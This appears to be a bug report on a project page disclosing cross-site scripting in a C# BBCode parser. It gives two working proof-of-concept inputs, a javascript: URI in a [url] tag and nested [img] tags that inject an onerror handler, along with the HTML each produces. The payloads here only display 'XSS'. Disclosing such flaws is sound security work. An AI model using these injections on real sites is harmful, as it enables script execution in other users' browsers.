This project is read-only.

XSS possible via img and url tags


Using the demo code for the project shown on the home page, it is possible to inject JavaScript into the page to be executed:

The parser is set up as:
 var parser = new BBCodeParser(new[]
                    new BBTag("b", "<b>", "</b>"), 
                    new BBTag("i", "<span style=\"font-style:italic;\">", "</span>"), 
                    new BBTag("u", "<span style=\"text-decoration:underline;\">", "</span>"), 
                    new BBTag("code", "<pre class=\"prettyprint\">", "</pre>"), 
                    new BBTag("img", "<img src=\"${content}\" />", "", false, true), 
                    new BBTag("quote", "<blockquote>", "</blockquote>"), 
                    new BBTag("list", "<ul>", "</ul>"), 
                    new BBTag("*", "<li>", "</li>", true, false), 
                    new BBTag("url", "<a href=\"${href}\">", "</a>", new BBAttribute("href", ""), new BBAttribute("href", "href")), 
The first test is a [url] as follows:
parser.ToHtml("[url href=javascript:document.body.innerHTML=String.fromCharCode(88,83,83)]bbcode[/url]")
Which results in the following HTML:
<a href="javascript:document.body.innerHTML=String.fromCharCode(88,83,83)">bbcodetest</a>
Clicking on this link will cause 'XSS' to be rendered to the page.

The second test is a [img] as follow:
parser.ToHtml("[img] [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]")
Which results in the following HTML:
<img src=" <img src=" onerror=javascript:alert(String.fromCharCode(88,83,83)) "/> " />
Which causes JavaScript to be executed.